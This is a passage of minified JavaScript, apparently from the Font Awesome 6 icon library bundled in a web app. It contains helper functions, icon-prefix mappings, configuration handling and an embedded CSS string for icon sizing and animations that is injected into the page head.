destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}function fb(t){return function Wye(t){if(Array.isArray(t))return I8(t)}(t)||function Vye(t){if("undefined"!=typeof Symbol&&null!=t[Symbol.iterator]||null!=t["@@iterator"])return Array.from(t)}(t)||oB(t)||function Hye(){throw new TypeError("Invalid attempt to spread non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}function oB(t,a){if(t){if("string"==typeof t)return I8(t,a);var e=Object.prototype.toString.call(t).slice(8,-1);if("Object"===e&&t.constructor&&(e=t.constructor.name),"Map"===e||"Set"===e)return Array.from(t);if("Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(e))return I8(t,a)}}function I8(t,a){(null==a||a>t.length)&&(a=t.length);for(var e=0,i=new Array(a);e<a;e++)i[e]=t[e];return i}var rB=function(){},R8={},sB={},cB=null,lB={mark:rB,measure:rB};try{"undefined"!=typeof window&&(R8=window),"undefined"!=typeof document&&(sB=document),"undefined"!=typeof MutationObserver&&(cB=MutationObserver),"undefined"!=typeof performance&&(lB=performance)}catch(t){}var gA,CA,yA,bA,MA,dB=(R8.navigator||{}).userAgent,mB=void 0===dB?"":dB,Mp=R8,Mr=sB,uB=cB,_A=lB,Kh=!!Mr.documentElement&&!!Mr.head&&"function"==typeof Mr.addEventListener&&"function"==typeof Mr.createElement,hB=~mB.indexOf("MSIE")||~mB.indexOf("Trident/"),Xh="___FONT_AWESOME___",pB="svg-inline--fa",vg="data-fa-i2svg",k8="data-fa-pseudo-element",P8="data-prefix",O8="data-icon",_B="fontawesome-i2svg",Qye=["HTML","HEAD","STYLE","SCRIPT"],gB=function(){try{return!0}catch(t){return!1}}(),vr="classic",Qr="sharp",N8=[vr,Qr];function pb(t){return new Proxy(t,{get:function(e,i){return i in e?e[i]:e[vr]}})}var _b=pb((Ws(gA={},vr,{fa:"solid",fas:"solid","fa-solid":"solid",far:"regular","fa-regular":"regular",fal:"light","fa-light":"light",fat:"thin","fa-thin":"thin",fad:"duotone","fa-duotone":"duotone",fab:"brands","fa-brands":"brands",fak:"kit","fa-kit":"kit"}),Ws(gA,Qr,{fa:"solid",fass:"solid","fa-solid":"solid"}),gA)),gb=pb((Ws(CA={},vr,{solid:"fas",regular:"far",light:"fal",thin:"fat",duotone:"fad",brands:"fab",kit:"fak"}),Ws(CA,Qr,{solid:"fass"}),CA)),Cb=pb((Ws(yA={},vr,{fab:"fa-brands",fad:"fa-duotone",fak:"fa-kit",fal:"fa-light",far:"fa-regular",fas:"fa-solid",fat:"fa-thin"}),Ws(yA,Qr,{fass:"fa-solid"}),yA)),$ye=pb((Ws(bA={},vr,{"fa-brands":"fab","fa-duotone":"fad","fa-kit":"fak","fa-light":"fal","fa-regular":"far","fa-solid":"fas","fa-thin":"fat"}),Ws(bA,Qr,{"fa-solid":"fass"}),bA)),Kye=/fa(s|r|l|t|d|b|k|ss)?[\-\ ]/,CB="fa-layers-text",Xye=/Font ?Awesome ?([56 ]*)(Solid|Regular|Light|Thin|Duotone|Brands|Free|Pro|Sharp|Kit)?.*/i,Yye=pb((Ws(MA={},vr,{900:"fas",400:"far",normal:"far",300:"fal",100:"fat"}),Ws(MA,Qr,{900:"fass"}),MA)),yB=[1,2,3,4,5,6,7,8,9,10],Jye=yB.concat([11,12,13,14,15,16,17,18,19,20]),Zye=["class","data-prefix","data-icon","data-fa-transform","data-fa-mask"],yb=new Set;Object.keys(gb[vr]).map(yb.add.bind(yb)),Object.keys(gb[Qr]).map(yb.add.bind(yb));var ebe=[].concat(N8,fb(yb),["2xs","xs","sm","lg","xl","2xl","beat","border","fade","beat-fade","bounce","flip-both","flip-horizontal","flip-vertical","flip","fw","inverse","layers-counter","layers-text","layers","li","pull-left","pull-right","pulse","rotate-180","rotate-270","rotate-90","rotate-by","shake","spin-pulse","spin-reverse","spin","stack-1x","stack-2x","stack","ul","duotone-group","swap-opacity","primary","secondary"]).concat(yB.map(function(t){return"".concat(t,"x")})).concat(Jye.map(function(t){return"w-".concat(t)})),bb=Mp.FontAwesomeConfig||{};Mr&&"function"==typeof Mr.querySelector&&[["data-family-prefix","familyPrefix"],["data-css-prefix","cssPrefix"],["data-family-default","familyDefault"],["data-style-default","styleDefault"],["data-replacement-class","replacementClass"],["data-auto-replace-svg","autoReplaceSvg"],["data-auto-add-css","autoAddCss"],["data-auto-a11y","autoA11y"],["data-search-pseudo-elements","searchPseudoElements"],["data-observe-mutations","observeMutations"],["data-mutate-approach","mutateApproach"],["data-keep-original-source","keepOriginalSource"],["data-measure-performance","measurePerformance"],["data-show-missing-icons","showMissingIcons"]].forEach(function(t){var a=w8(t,2),i=a[1],n=function ibe(t){return""===t||"false"!==t&&("true"===t||t)}(function tbe(t){var a=Mr.querySelector("script["+t+"]");if(a)return a.getAttribute(t)}(a[0]));null!=n&&(bb[i]=n)});var bB={styleDefault:"solid",familyDefault:"classic",cssPrefix:"fa",replacementClass:pB,autoReplaceSvg:!0,autoAddCss:!0,autoA11y:!0,searchPseudoElements:!1,observeMutations:!0,mutateApproach:"async",keepOriginalSource:!0,measurePerformance:!1,showMissingIcons:!0};bb.familyPrefix&&(bb.cssPrefix=bb.familyPrefix);var G1=ia(ia({},bB),bb);G1.autoReplaceSvg||(G1.observeMutations=!1);var Ca={};Object.keys(bB).forEach(function(t){Object.defineProperty(Ca,t,{enumerable:!0,set:function(e){G1[t]=e,Mb.forEach(function(i){return i(Ca)})},get:function(){return G1[t]}})}),Object.defineProperty(Ca,"familyPrefix",{enumerable:!0,set:function(a){G1.cssPrefix=a,Mb.forEach(function(e){return e(Ca)})},get:function(){return G1.cssPrefix}}),Mp.FontAwesomeConfig=Ca;var Mb=[],xu={size:16,x:0,y:0,rotate:0,flipX:!1,flipY:!1};function vb(){for(var t=12,a="";t-- >0;)a+="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"[62*Math.random()|0];return a}function j1(t){for(var a=[],e=(t||[]).length>>>0;e--;)a[e]=t[e];return a}function L8(t){return t.classList?j1(t.classList):(t.getAttribute("class")||"").split(" ").filter(function(a){return a})}function MB(t){return"".concat(t).replace(/&/g,"&amp;").replace(/"/g,"&quot;").replace(/'/g,"&#39;").replace(/</g,"&lt;").replace(/>/g,"&gt;")}function vA(t){return Object.keys(t||{}).reduce(function(a,e){return a+"".concat(e,": ").concat(t[e].trim(),";")},"")}function z8(t){return t.size!==xu.size||t.x!==xu.x||t.y!==xu.y||t.rotate!==xu.rotate||t.flipX||t.flipY}function vB(){var t="fa",a=pB,e=Ca.cssPrefix,i=Ca.replacementClass,n=':root, :host {\n  --fa-font-solid: normal 900 1em/1 "Font Awesome 6 Solid";\n  --fa-font-regular: normal 400 1em/1 "Font Awesome 6 Regular";\n  --fa-font-light: normal 300 1em/1 "Font Awesome 6 Light";\n  --fa-font-thin: normal 100 1em/1 "Font Awesome 6 Thin";\n  --fa-font-duotone: normal 900 1em/1 "Font Awesome 6 Duotone";\n  --fa-font-sharp-solid: normal 900 1em/1 "Font Awesome 6 Sharp";\n  --fa-font-brands: normal 400 1em/1 "Font Awesome 6 Brands";\n}\n\nsvg:not(:root).svg-inline--fa, svg:not(:host).svg-inline--fa {\n  overflow: visible;\n  box-sizing: content-box;\n}\n\n.svg-inline--fa {\n  display: var(--fa-display, inline-block);\n  height: 1em;\n  overflow: visible;\n  vertical-align: -0.125em;\n}\n.svg-inline--fa.fa-2xs {\n  vertical-align: 0.1em;\n}\n.svg-inline--fa.fa-xs {\n  vertical-align: 0em;\n}\n.svg-inline--fa.fa-sm {\n  vertical-align: -0.0714285705em;\n}\n.svg-inline--fa.fa-lg {\n  vertical-align: -0.2em;\n}\n.svg-inline--fa.fa-xl {\n  vertical-align: -0.25em;\n}\n.svg-inline--fa.fa-2xl {\n  vertical-align: -0.3125em;\n}\n.svg-inline--fa.fa-pull-left {\n  margin-right: var(--fa-pull-margin, 0.3em);\n  width: auto;\n}\n.svg-inline--fa.fa-pull-right {\n  margin-left: var(--fa-pull-margin, 0.3em);\n  width: auto;\n}\n.svg-inline--fa.fa-li {\n  width: var(--fa-li-width, 2em);\n  top: 0.25em;\n}\n.svg-inline--fa.fa-fw {\n  width: var(--fa-fw-width, 1.25em);\n}\n\n.fa-layers svg.svg-inline--fa {\n  bottom: 0;\n  left: 0;\n  margin: auto;\n  position: absolute;\n  right: 0;\n  top: 0;\n}\n\n.fa-layers-counter, .fa-layers-text {\n  display: inline-block;\n  position: absolute;\n  text-align: center;\n}\n\n.fa-layers {\n  display: inline-block;\n  height: 1em;\n  position: relative;\n  text-align: center;\n  vertical-align: -0.125em;\n  width: 1em;\n}\n.fa-layers svg.svg-inline--fa {\n  -webkit-transform-origin: center center;\n          transform-origin: center center;\n}\n\n.fa-layers-text {\n  left: 50%;\n  top: 50%;\n  -webkit-transform: translate(-50%, -50%);\n          transform: translate(-50%, -50%);\n  -webkit-transform-origin: center center;\n          transform-origin: center center;\n}\n\n.fa-layers-counter {\n  background-color: var(--fa-counter-background-color, #ff253a);\n  border-radius: var(--fa-counter-border-radius, 1em);\n  box-sizing: border-box;\n  color: var(--fa-inverse, #fff);\n  line-height: var(--fa-counter-line-height, 1);\n  max-width: var(--fa-counter-max-width, 5em);\n  min-width: var(--fa-counter-min-width, 1.5em);\n  overflow: hidden;\n  padding: var(--fa-counter-padding, 0.25em 0.5em);\n  right: var(--fa-right, 0);\n  text-overflow: ellipsis;\n  top: var(--fa-top, 0);\n  -webkit-transform: scale(var(--fa-counter-scale, 0.25));\n          transform: scale(var(--fa-counter-scale, 0.25));\n  -webkit-transform-origin: top right;\n          transform-origin: top right;\n}\n\n.fa-layers-bottom-right {\n  bottom: var(--fa-bottom, 0);\n  right: var(--fa-right, 0);\n  top: auto;\n  -webkit-transform: scale(var(--fa-layers-scale, 0.25));\n          transform: scale(var(--fa-layers-scale, 0.25));\n  -webkit-transform-origin: bottom right;\n          transform-origin: bottom right;\n}\n\n.fa-layers-bottom-left {\n  bottom: var(--fa-bottom, 0);\n  left: var(--fa-left, 0);\n  right: auto;\n  top: auto;\n  -webkit-transform: scale(var(--fa-layers-scale, 0.25));\n          transform: scale(var(--fa-layers-scale, 0.25));\n  -webkit-transform-origin: bottom left;\n          transform-origin: bottom left;\n}\n\n.fa-layers-top-right {\n  top: var(--fa-top, 0);\n  right: var(--fa-right, 0);\n  -webkit-transform: scale(var(--fa-layers-scale, 0.25));\n          transform: scale(var(--fa-layers-scale, 0.25));\n  -webkit-transform-origin: top right;\n          transform-origin: top right;\n}\n\n.fa-layers-top-left {\n  left: var(--fa-left, 0);\n  right: auto;\n  top: var(--fa-top, 0);\n  -webkit-transform: scale(var(--fa-layers-scale, 0.25));\n          transform: scale(var(--fa-layers-scale, 0.25));\n  -webkit-transform-origin: top left;\n          transform-origin: top left;\n}\n\n.fa-1x {\n  font-size: 1em;\n}\n\n.fa-2x {\n  font-size: 2em;\n}\n\n.fa-3x {\n  font-size: 3em;\n}\n\n.fa-4x {\n  font-size: 4em;\n}\n\n.fa-5x {\n  font-size: 5em;\n}\n\n.fa-6x {\n  font-size: 6em;\n}\n\n.fa-7x {\n  font-size: 7em;\n}\n\n.fa-8x {\n  font-size: 8em;\n}\n\n.fa-9x {\n  font-size: 9em;\n}\n\n.fa-10x {\n  font-size: 10em;\n}\n\n.fa-2xs {\n  font-size: 0.625em;\n  line-height: 0.1em;\n  vertical-align: 0.225em;\n}\n\n.fa-xs {\n  font-size: 0.75em;\n  line-height: 0.0833333337em;\n  vertical-align: 0.125em;\n}\n\n.fa-sm {\n  font-size: 0.875em;\n  line-height: 0.0714285718em;\n  vertical-align: 0.0535714295em;\n}\n\n.fa-lg {\n  font-size: 1.25em;\n  line-height: 0.05em;\n  vertical-align: -0.075em;\n}\n\n.fa-xl {\n  font-size: 1.5em;\n  line-height: 0.0416666682em;\n  vertical-align: -0.125em;\n}\n\n.fa-2xl {\n  font-size: 2em;\n  line-height: 0.03125em;\n  vertical-align: -0.1875em;\n}\n\n.fa-fw {\n  text-align: center;\n  width: 1.25em;\n}\n\n.fa-ul {\n  list-style-type: none;\n  margin-left: var(--fa-li-margin, 2.5em);\n  padding-left: 0;\n}\n.fa-ul > li {\n  position: relative;\n}\n\n.fa-li {\n  left: calc(var(--fa-li-width, 2em) * -1);\n  position: absolute;\n  text-align: center;\n  width: var(--fa-li-width, 2em);\n  line-height: inherit;\n}\n\n.fa-border {\n  border-color: var(--fa-border-color, #eee);\n  border-radius: var(--fa-border-radius, 0.1em);\n  border-style: var(--fa-border-style, solid);\n  border-width: var(--fa-border-width, 0.08em);\n  padding: var(--fa-border-padding, 0.2em 0.25em 0.15em);\n}\n\n.fa-pull-left {\n  float: left;\n  margin-right: var(--fa-pull-margin, 0.3em);\n}\n\n.fa-pull-right {\n  float: right;\n  margin-left: var(--fa-pull-margin, 0.3em);\n}\n\n.fa-beat {\n  -webkit-animation-name: fa-beat;\n          animation-name: fa-beat;\n  -webkit-animation-delay: var(--fa-animation-delay, 0s);\n          animation-delay: var(--fa-animation-delay, 0s);\n  -webkit-animation-direction: var(--fa-animation-direction, normal);\n          animation-direction: var(--fa-animation-direction, normal);\n  -webkit-animation-duration: var(--fa-animation-duration, 1s);\n          animation-duration: var(--fa-animation-duration, 1s);\n  -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n          animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n  -webkit-animation-timing-function: var(--fa-animation-timing, ease-in-out);\n          animation-timing-function: var(--fa-animation-timing, ease-in-out);\n}\n\n.fa-bounce {\n  -webkit-animation-name: fa-bounce;\n          animation-name: fa-bounce;\n  -webkit-animation-delay: var(--fa-animation-delay, 0s);\n          animation-delay: var(--fa-animation-delay, 0s);\n  -webkit-animation-direction: var(--fa-animation-direction, normal);\n          animation-direction: var(--fa-animation-direction, normal);\n  -webkit-animation-duration: var(--fa-animation-duration, 1s);\n          animation-duration: var(--fa-animation-duration, 1s);\n  -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n          animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n  -webkit-animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.28, 0.84, 0.42, 1));\n          animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.28, 0.84, 0.42, 1));\n}\n\n.fa-fade {\n  -webkit-animation-name: fa-fade;\n          animation-name: fa-fade;\n  -webkit-animation-delay: var(--fa-animation-delay, 0s);\n          animation-delay: var(--fa-animation-delay, 0s);\n  -webkit-animation-direction: var(--fa-animation-direction, normal);\n          animation-direction: var(--fa-animation-direction, normal);\n  -webkit-animation-duration: var(--fa-animation-duration, 1s);\n          animation-duration: var(--fa-animation-duration, 1s);\n  -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n          animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n  -webkit-animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.4, 0, 0.6, 1));\n          animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.4, 0, 0.6, 1));\n}\n\n.fa-beat-fade {\n  -webkit-animation-name: fa-beat-fade;\n          animation-name: fa-beat-fade;\n  -webkit-animation-delay: var(--fa-animation-delay, 0s);\n          animation-delay: var(--fa-animation-delay, 0s);\n  -webkit-animation-direction: var(--fa-animation-direction, normal);\n          animation-direction: var(--fa-animation-direction, normal);\n  -webkit-animation-duration: var(--fa-animation-duration, 1s);\n          animation-duration: var(--fa-animation-duration, 1s);\n  -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n          animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n  -webkit-animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.4, 0, 0.6, 1));\n          animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.4, 0, 0.6, 1));\n}\n\n.fa-flip {\n  -webkit-animation-name: fa-flip;\n          animation-name: fa-flip;\n  -webkit-animation-delay: var(--fa-animation-delay, 0s);\n          animation-delay: var(--fa-animation-delay, 0s);\n  -webkit-animation-direction: var(--fa-animation-direction, normal);\n          animation-direction: var(--fa-animation-direction, normal);\n  -webkit-animation-duration: var(--fa-animation-duration, 1s);\n          animation-duration: var(--fa-animation-duration, 1s);\n  -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n          animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n  -webkit-animation-timing-function: var(--fa-animation-timing, ease-in-out);\n          animation-timing-function: var(--fa-animation-timing, ease-in-out);\n}\n\n.fa-shake {\n  -webkit-animation-name: fa-shake;\n          animation-name: fa-shake;\n  -webkit-animation-delay: var(--fa-animation-delay, 0s);\n          animation-delay: var(--fa-animation-delay, 0s);\n  -webkit-animation-direction: var(--fa-animation-direction, normal);\n          animation-direction: var(--fa-animation-direction, normal);\n  -webkit-animation-duration: var(--fa-animation-duration, 1s);\n          animation-duration: var(--fa-animation-duration, 1s);\n  -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n          animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n  -webkit-animation-timing-function: var(--fa-animation-timing, linear);\n          animation-timing-function: var(--fa-animation-timing, linear);\n}\n\n.fa-spin {\n  -webkit-animation-name: fa-spin;\n          animation-name: fa-spin;\n  -webkit-animation-delay: var(--fa-animation-delay, 0s);\n          animation-delay: var(--fa-animation-delay, 0s);\n  -webkit-animation-direction: var(--fa-animation-direction, normal);\n          animation-direction: var(--fa-animation-direction, normal);\n  -webkit-animation-duration: var(--fa-animation-duration, 2s);\n          animation-duration: var(--fa-animation-duration, 2s);\n  -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n          animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n  -webkit-animation-timing-function: var(--fa-animation-timing, linear);\n          animation-timing-function: var(--fa-animation-timing, linear);\n}\n\n.fa-spin-reverse {\n  --fa-animation-direction: reverse;\n}\n\n.fa-pulse,\n.fa-spin-pulse {\n  -webkit-animation-name: fa-spin;\n          animation-name: fa-spin;\n  -webkit-animation-direction: var(--fa-animation-direction, normal);\n          animation-direction: var(--fa-animation-direction, normal);\n  -webkit-animation-duration: var(--fa-animation-duration, 1s);\n          animation-duration: var(--fa-animation-duration, 1s);\n  -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n          animation-iteration-count: var(--fa-animation-iteration-count, infinite);\n  -webkit-animation-timing-function: var(--fa-animation-timing, steps(8));\n          animation-timing-function: var(--fa-animation-timing, steps(8));\n}\n\n@media (prefers-reduced-motion: reduce) {\n  .fa-beat,\n.fa-bounce,\n.fa-fade,\n.fa-beat-fade,\n.fa-flip,\n.fa-pulse,\n.fa-shake,\n.fa-spin,\n.fa-spin-pulse {\n    -webkit-animation-delay: -1ms;\n            animation-delay: -1ms;\n    -webkit-animation-duration: 1ms;\n            animation-duration: 1ms;\n    -webkit-animation-iteration-count: 1;\n            animation-iteration-count: 1;\n    transition-delay: 0s;\n    transition-duration: 0s;\n  }\n}\n@-webkit-keyframes fa-beat {\n  0%, 90% {\n    -webkit-transform: scale(1);\n            transform: scale(1);\n  }\n  45% {\n    -webkit-transform: scale(var(--fa-beat-scale, 1.25));\n            transform: scale(var(--fa-beat-scale, 1.25));\n  }\n}\n@keyframes fa-beat {\n  0%, 90% {\n    -webkit-transform: scale(1);\n            transform: scale(1);\n  }\n  45% {\n    -webkit-transform: scale(var(--fa-beat-scale, 1.25));\n            transform: scale(var(--fa-beat-scale, 1.25));\n  }\n}\n@-webkit-keyframes fa-bounce {\n  0% {\n    -webkit-transform: scale(1, 1) translateY(0);\n            transform: scale(1, 1) translateY(0);\n  }\n  10% {\n    -webkit-transform: scale(var(--fa-bounce-start-scale-x, 1.1), var(--fa-bounce-start-scale-y, 0.9)) translateY(0);\n            transform: scale(var(--fa-bounce-start-scale-x, 1.1), var(--fa-bounce-start-scale-y, 0.9)) translateY(0);\n  }\n  30% {\n    -webkit-transform: scale(var(--fa-bounce-jump-scale-x, 0.9), var(--fa-bounce-jump-scale-y, 1.1)) translateY(var(--fa-bounce-height, -0.5em));\n            transform: scale(var(--fa-bounce-jump-scale-x, 0.9), var(--fa-bounce-jump-scale-y, 1.1)) translateY(var(--fa-bounce-height, -0.5em));\n  }\n  50% {\n    -webkit-transform: scale(var(--fa-bounce-land-scale-x, 1.05), var(--fa-bounce-land-scale-y, 0.95)) translateY(0);\n            transform: scale(var(--fa-bounce-land-scale-x, 1.05), var(--fa-bounce-land-scale-y, 0.95)) translateY(0);\n  }\n  57% {\n    -webkit-transform: scale(1, 1) translateY(var(--fa-bounce-rebound, -0.125em));\n            transform: scale(1, 1) translateY(var(--fa-bounce-rebound, -0.125em));\n  }\n  64% {\n    -webkit-transform: scale(1, 1) translateY(0);\n            transform: scale(1, 1) translateY(0);\n  }\n  100% {\n    -webkit-transform: scale(1, 1) translateY(0);\n            transform: scale(1, 1) translateY(0);\n  }\n}\n@keyframes fa-bounce {\n  0% {\n    -webkit-transform: scale(1, 1) translateY(0);\n            transform: scale(1, 1) translateY(0);\n  }\n  10% {\n    -webkit-transform: scale(var(--fa-bounce-start-scale-x, 1.1), var(--fa-bounce-start-scale-y, 0.9)) translateY(0);\n            transform: scale(var(--fa-bounce-start-scale-x, 1.1), var(--fa-bounce-start-scale-y, 0.9)) translateY(0);\n  }\n  30% {\n    -webkit-transform: scale(var(--fa-bounce-jump-scale-x, 0.9), var(--fa-bounce-jump-scale-y, 1.1)) translateY(var(--fa-bounce-height, -0.5em));\n            transform: scale(var(--fa-bounce-jump-scale-x, 0.9), var(--fa-bounce-jump-scale-y, 1.1)) translateY(var(--fa-bounce-height, -0.5em));\n  }\n  50% {\n    -webkit-transform: scale(var(--fa-bounce-land-scale-x, 1.05), var(--fa-bounce-land-scale-y, 0.95)) translateY(0);\n            transform: scale(var(--fa-bounce-land-scale-x, 1.05), var(--fa-bounce-land-scale-y, 0.95)) translateY(0);\n  }\n  57% {\n    -webkit-transform: scale(1, 1) translateY(var(--fa-bounce-rebound, -0.125em));\n            transform: scale(1, 1) translateY(var(--fa-bounce-rebound, -0.125em));\n  }\n  64% {\n    -webkit-transform: scale(1, 1) translateY(0);\n            transform: scale(1, 1) translateY(0);\n  }\n  100% {\n    -webkit-transform: scale(1, 1) translateY(0);\n            transform: scale(1, 1) translateY(0);\n  }\n}\n@-webkit-keyframes fa-fade {\n  50% {\n    opacity: var(--fa-fade-opacity, 0.4);\n  }\n}\n@keyframes fa-fade {\n  50% {\n    opacity: var(--fa-fade-opacity, 0.4);\n  }\n}\n@-webkit-keyframes fa-beat-fade {\n  0%, 100% {\n    opacity: var(--fa-beat-fade-opacity, 0.4);\n    -webkit-transform: scale(1);\n            transform: scale(1);\n  }\n  50% {\n    opacity: 1;\n    -webkit-transform: scale(var(--fa-beat-fade-scale, 1.125));\n            transform: scale(var(--fa-beat-fade-scale, 1.125));\n  }\n}\n@keyframes fa-beat-fade {\n  0%, 100% {\n    opacity: var(--fa-beat-fade-opacity, 0.4);\n    -webkit-transform: scale(1);\n            transform: scale(1);\n  }\n  50% {\n    opacity: 1;\n    -webkit-transform: scale(var(--fa-beat-fade-scale, 1.125));\n            transform: scale(var(--fa-beat-fade-scale, 1.125));\n  }\n}\n@-webkit-keyframes fa-flip {\n  50% {\n    -webkit-transform: rotate3d(var(--fa-flip-x, 0), var(--fa-flip-y, 1), var(--fa-flip-z, 0), var(--fa-flip-angle, -180deg));\n            transform: rotate3d(var(--fa-flip-x, 0), var(--fa-flip-y, 1), var(--fa-flip-z, 0), var(--fa-flip-angle, -180deg));\n  }\n}\n@keyframes fa-flip {\n  50% {\n    -webkit-transform: rotate3d(var(--fa-flip-x, 0), var(--fa-flip-y, 1), var(--fa-flip-z, 0), var(--fa-flip-angle, -180deg));\n            transform: rotate3d(var(--fa-flip-x, 0), var(--fa-flip-y, 1), var(--fa-flip-z, 0), var(--fa-flip-angle, -180deg));\n  }\n}\n@-webkit-keyframes fa-shake {\n  0% {\n    -webkit-transform: rotate(-15deg);\n            transform: rotate(-15deg);\n  }\n  4% {\n    -webkit-transform: rotate(15deg);\n            transform: rotate(15deg);\n  }\n  8%, 24% {\n    -webkit-transform: rotate(-18deg);\n            transform: rotate(-18deg);\n  }\n  12%, 28% {\n    -webkit-transform: rotate(18deg);\n            transform: rotate(18deg);\n  }\n  16% {\n    -webkit-transform: rotate(-22deg);\n            transform: rotate(-22deg);\n  }\n  20% {\n    -webkit-transform: rotate(22deg);\n            transform: rotate(22deg);\n  }\n  32% {\n    -webkit-transform: rotate(-12deg);\n            transform: rotate(-12deg);\n  }\n  36% {\n    -webkit-transform: rotate(12deg);\n            transform: rotate(12deg);\n  }\n  40%, 100% {\n    -webkit-transform: rotate(0deg);\n            transform: rotate(0deg);\n  }\n}\n@keyframes fa-shake {\n  0% {\n    -webkit-transform: rotate(-15deg);\n            transform: rotate(-15deg);\n  }\n  4% {\n    -webkit-transform: rotate(15deg);\n            transform: rotate(15deg);\n  }\n  8%, 24% {\n    -webkit-transform: rotate(-18deg);\n            transform: rotate(-18deg);\n  }\n  12%, 28% {\n    -webkit-transform: rotate(18deg);\n            transform: rotate(18deg);\n  }\n  16% {\n    -webkit-transform: rotate(-22deg);\n            transform: rotate(-22deg);\n  }\n  20% {\n    -webkit-transform: rotate(22deg);\n            transform: rotate(22deg);\n  }\n  32% {\n    -webkit-transform: rotate(-12deg);\n            transform: rotate(-12deg);\n  }\n  36% {\n    -webkit-transform: rotate(12deg);\n            transform: rotate(12deg);\n  }\n  40%, 100% {\n    -webkit-transform: rotate(0deg);\n            transform: rotate(0deg);\n  }\n}\n@-webkit-keyframes fa-spin {\n  0% {\n    -webkit-transform: rotate(0deg);\n            transform: rotate(0deg);\n  }\n  100% {\n    -webkit-transform: rotate(360deg);\n            transform: rotate(360deg);\n  }\n}\n@keyframes fa-spin {\n  0% {\n    -webkit-transform: rotate(0deg);\n            transform: rotate(0deg);\n  }\n  100% {\n    -webkit-transform: rotate(360deg);\n            transform: rotate(360deg);\n  }\n}\n.fa-rotate-90 {\n  -webkit-transform: rotate(90deg);\n          transform: rotate(90deg);\n}\n\n.fa-rotate-180 {\n  -webkit-transform: rotate(180deg);\n          transform: rotate(180deg);\n}\n\n.fa-rotate-270 {\n  -webkit-transform: rotate(270deg);\n          transform: rotate(270deg);\n}\n\n.fa-flip-horizontal {\n  -webkit-transform: scale(-1, 1);\n          transform: scale(-1, 1);\n}\n\n.fa-flip-vertical {\n  -webkit-transform: scale(1, -1);\n          transform: scale(1, -1);\n}\n\n.fa-flip-both,\n.fa-flip-horizontal.fa-flip-vertical {\n  -webkit-transform: scale(-1, -1);\n          transform: scale(-1, -1);\n}\n\n.fa-rotate-by {\n  -webkit-transform: rotate(var(--fa-rotate-angle, none));\n          transform: rotate(var(--fa-rotate-angle, none));\n}\n\n.fa-stack {\n  display: inline-block;\n  vertical-align: middle;\n  height: 2em;\n  position: relative;\n  width: 2.5em;\n}\n\n.fa-stack-1x,\n.fa-stack-2x {\n  bottom: 0;\n  left: 0;\n  margin: auto;\n  position: absolute;\n  right: 0;\n  top: 0;\n  z-index: var(--fa-stack-z-index, auto);\n}\n\n.svg-inline--fa.fa-stack-1x {\n  height: 1em;\n  width: 1.25em;\n}\n.svg-inline--fa.fa-stack-2x {\n  height: 2em;\n  width: 2.5em;\n}\n\n.fa-inverse {\n  color: var(--fa-inverse, #fff);\n}\n\n.sr-only,\n.fa-sr-only {\n  position: absolute;\n  width: 1px;\n  height: 1px;\n  padding: 0;\n  margin: -1px;\n  overflow: hidden;\n  clip: rect(0, 0, 0, 0);\n  white-space: nowrap;\n  border-width: 0;\n}\n\n.sr-only-focusable:not(:focus),\n.fa-sr-only-focusable:not(:focus) {\n  position: absolute;\n  width: 1px;\n  height: 1px;\n  padding: 0;\n  margin: -1px;\n  overflow: hidden;\n  clip: rect(0, 0, 0, 0);\n  white-space: nowrap;\n  border-width: 0;\n}\n\n.svg-inline--fa .fa-primary {\n  fill: var(--fa-primary-color, currentColor);\n  opacity: var(--fa-primary-opacity, 1);\n}\n\n.svg-inline--fa .fa-secondary {\n  fill: var(--fa-secondary-color, currentColor);\n  opacity: var(--fa-secondary-opacity, 0.4);\n}\n\n.svg-inline--fa.fa-swap-opacity .fa-primary {\n  opacity: var(--fa-secondary-opacity, 0.4);\n}\n\n.svg-inline--fa.fa-swap-opacity .fa-secondary {\n  opacity: var(--fa-primary-opacity, 1);\n}\n\n.svg-inline--fa mask .fa-primary,\n.svg-inline--fa mask .fa-secondary {\n  fill: black;\n}\n\n.fad.fa-inverse,\n.fa-duotone.fa-inverse {\n  color: var(--fa-inverse, #fff);\n}';if(e!==t||i!==a){var r=new RegExp("\\.".concat(t,"\\-"),"g"),c=new RegExp("\\--".concat(t,"\\-"),"g"),d=new RegExp("\\.".concat(a),"g");n=n.replace(r,".".concat(e,"-")).replace(c,"--".concat(e,"-")).replace(d,".".concat(i))}return n}var AB=!1;function W8(){Ca.autoAddCss&&!AB&&(function obe(t){if(t&&Kh){var a=Mr.createElement("style");a.setAttribute("type","text/css"),a.innerHTML=t;for(var e=Mr.head.childNodes,i=null,n=e.length-1;n>-1;n--){var r=e[n],c=(r.tagName||"").toUpperCase();["STYLE","LINK"].indexOf(c)>-1&&(i=r)}Mr.head.insertBefore(a,i)}}(vB()),AB=!0)}var 